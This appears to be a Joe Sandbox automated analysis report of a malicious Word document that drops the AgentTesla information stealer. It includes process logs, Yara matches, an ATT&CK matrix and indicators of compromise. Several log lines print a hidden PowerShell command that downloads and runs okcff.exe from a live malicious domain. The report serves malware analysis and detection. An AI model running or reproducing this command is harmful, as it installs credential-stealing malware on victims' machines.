                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\okcff.exe "C:\Users\user\AppData\Roaming\okcff.exe"
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
                    Source: C:\Users\user\AppData\Roaming\okcff.exeProcess created: C:\Users\user\AppData\Roaming\okcff.exe C:\Users\user\AppData\Roaming\okcff.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 2
                    Source: notepad.exe, 00000018.00000002.699385356.0000000000730000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: notepad.exe, 00000018.00000002.699385356.0000000000730000.00000002.00020000.sdmpBinary or memory string: !Progman
                    Source: notepad.exe, 00000018.00000002.699385356.0000000000730000.00000002.00020000.sdmpBinary or memory string: Program Manager<
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\okcff.exeQueries volume information: C:\Users\user\AppData\Roaming\okcff.exe VolumeInformation
                    Source: C:\Windows\System32\notepad.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\okcff.exeQueries volume information: C:\Users\user\AppData\Roaming\okcff.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\okcff.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\okcff.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 41.0.okcff.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.okcff.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.3605ff0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.okcff.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.3605ff0.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.351f270.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.okcff.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.34f7250.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.okcff.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.2.okcff.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.351f270.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.35871d0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.2584fcc.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.618395445.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.617550638.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.615331968.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: okcff.exe PID: 2656, type: MEMORYSTR
                    Source: Yara matchFile source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, type: MEMORY

                    Remote Access Functionality:

                    barindex
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 41.0.okcff.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.okcff.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.3605ff0.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.okcff.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.3605ff0.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.351f270.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.okcff.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.34f7250.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.0.okcff.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 41.2.okcff.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.351f270.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.35871d0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.2584fcc.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000029.00000002.699544517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.616337144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.618395445.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.617550638.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000000.615331968.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000029.00000002.700177359.00000000022A1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: okcff.exe PID: 2656, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection212Disable or Modify Tools1OS Credential DumpingFile and Directory Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScripting3Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery114Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Scripting3Security Account ManagerSecurity Software Discovery211SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsExploitation for Client Execution33Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol22SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCommand and Scripting Interpreter11Network Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsVirtualization/Sandbox Evasion131SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaPowerShell3Rc.commonRc.commonTimestomp1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion131Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection212/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 553100 Sample: 478644.doc Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 69 Found malware configuration 2->69 71 Sigma detected: Powershell download and execute file 2->71 73 Multi AV Scanner detection for submitted file 2->73 75 16 other signatures 2->75 9 WINWORD.EXE 306 47 2->9         started        process3 dnsIp4 61 mitmar-pl.com 37.0.9.166, 49167, 49168, 49169 WKD-ASIE Netherlands 9->61 53 C:\Users\user\AppData\Local\...\okcff[1].exe, PE32 9->53 dropped 55 C:\Users\user\Desktop\~$478644.doc, data 9->55 dropped 57 C:\Users\user\AppData\...\abdtfhghgeghDp .ScT, data 9->57 dropped 59 C:\Users\user\AppData\Local\...\7CE2D32D.png, 370 9->59 dropped 89 Document exploit detected (creates forbidden files) 9->89 91 Suspicious powershell command line found 9->91 93 Tries to download and execute files (via powershell) 9->93 95 Microsoft Office creates scripting files 9->95 14 powershell.exe 7 9->14         started        17 powershell.exe 12 7 9->17         started        21 notepad.exe 9->21         started        23 2 other processes 9->23 file5 signatures6 process7 dnsIp8 65 mitmar-pl.com 14->65 25 okcff.exe 12 1 14->25         started        67 mitmar-pl.com 17->67 51 C:\Users\user\AppData\Roaming\okcff.exe, PE32 17->51 dropped 77 Powershell drops PE file 17->77 79 Injects files into Windows application 21->79 file9 signatures10 process11 dnsIp12 63 mitmar-pl.com 25->63 81 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 25->81 83 Machine Learning detection for dropped file 25->83 85 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 25->85 87 Injects a PE file into a foreign processes 25->87 29 cmd.exe 25->29         started        31 cmd.exe 25->31         started        33 cmd.exe 25->33         started        35 7 other processes 25->35 signatures13 process14 process15 37 timeout.exe 29->37         started        39 timeout.exe 31->39         started        41 timeout.exe 33->41         started        43 timeout.exe 35->43         started        45 timeout.exe 35->45         started        47 timeout.exe 35->47         started        49 3 other processes 35->49

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    478644.doc41%VirustotalBrowse
                    478644.doc31%ReversingLabsDocument-Office.Trojan.RTFObfustream

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\okcff.exe100%Joe Sandbox ML

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    41.0.okcff.exe.400000.5.unpack100%AviraTR/Spy.Gen8Download File
                    41.0.okcff.exe.400000.7.unpack100%AviraTR/Spy.Gen8Download File
                    41.0.okcff.exe.400000.9.unpack100%AviraTR/Spy.Gen8Download File
                    41.0.okcff.exe.400000.13.unpack100%AviraTR/Spy.Gen8Download File
                    41.0.okcff.exe.400000.11.unpack100%AviraTR/Spy.Gen8Download File
                    41.2.okcff.exe.400000.0.unpack100%AviraHEUR/AGEN.1138205Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    httP://mitmar-pl.com/okcff.ex0%Avira URL Cloudsafe
                    http://mitmar-pl.com/Crkrqdrd.jpegi0%Avira URL Cloudsafe
                    httP://mitmar-pl.com/okcff.exe0%Avira URL Cloudsafe
                    http://mitmar-pl.com/Crkrqdrd.jpeg0%Avira URL Cloudsafe
                    https://google.comD0%Avira URL Cloudsafe
                    httP://mitmar-pl.com/okcff.exePE0%Avira URL Cloudsafe
                    http://mitmar-pl.com0%Avira URL Cloudsafe
                    http://www.%s.comPA0%URL Reputationsafe
                    httP://mitmar-pl.com/ok0%Avira URL Cloudsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mitmar-pl.com
                    		37.0.9.166
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://mitmar-pl.com/okcff.exefalse
                        		unknown
                        http://mitmar-pl.com/Crkrqdrd.jpegfalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.windows.com/pctv.notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpfalse
                          		high
                          http://www.piriform.com/ccleanpowershell.exe, 00000005.00000002.438200981.00000000003EF000.00000004.00000020.sdmpfalse
                            		high
                            http://investor.msn.comnotepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpfalse
                              		high
                              http://www.msnbc.com/news/ticker.txtnotepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpfalse
                                		high
                                https://stackoverflow.com/q/14436606/23354okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.621327809.00000000022E7000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpfalse
                                  		high
                                  https://github.com/mgravell/protobuf-netJokcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpfalse
                                    		high
                                    httP://mitmar-pl.com/okcff.expowershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://github.com/mgravell/protobuf-netokcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpfalse
                                      		high
                                      http://mitmar-pl.com/Crkrqdrd.jpegiokcff.exe, 00000009.00000000.439195914.00000000009F2000.00000020.00020000.sdmp, okcff.exe, 00000009.00000002.620997931.00000000009F2000.00000020.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.hotmail.com/oenotepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpfalse
                                        		high
                                        httP://mitmar-pl.com/okcff.exepowershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://google.com/okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmpfalse
                                          		high
                                          https://google.comDokcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000003.00000002.437210048.00000000023B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.438620831.0000000002450000.00000002.00020000.sdmp, okcff.exe, 00000009.00000002.624048048.0000000004D70000.00000002.00020000.sdmpfalse
                                            		high
                                            httP://mitmar-pl.com/okcff.exePEpowershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://github.com/mgravell/protobuf-netiokcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpfalse
                                              		high
                                              http://mitmar-pl.compowershell.exe, 00000003.00000002.440935004.000000000371C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.441337667.0000000003819000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://stackoverflow.com/q/11564914/23354;okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpfalse
                                                		high
                                                https://stackoverflow.com/q/2152978/23354okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmpfalse
                                                  		high
                                                  http://investor.msn.com/notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpfalse
                                                    		high
                                                    http://www.%s.comPApowershell.exe, 00000003.00000002.437210048.00000000023B0000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.438620831.0000000002450000.00000002.00020000.sdmp, okcff.exe, 00000009.00000002.624048048.0000000004D70000.00000002.00020000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		low
                                                    httP://mitmar-pl.com/okpowershell.exe, 00000005.00000002.444344400.000000000370C000.00000004.00000001.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.438200981.00000000003EF000.00000004.00000020.sdmpfalse
                                                      		high
                                                      https://google.comokcff.exefalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameokcff.exe, 00000009.00000002.621297461.00000000022C1000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipokcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623598488.00000000034DF000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown

                                                          Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          37.0.9.166
                                                          		mitmar-pl.comNetherlands
                                                          		198301WKD-ASIEtrue

                                                          General Information

                                                          Joe Sandbox Version:34.0.0 Boulder Opal
                                                          Analysis ID:553100
                                                          Start date:14.01.2022
                                                          Start time:10:22:19
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 10m 37s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:478644.doc
                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
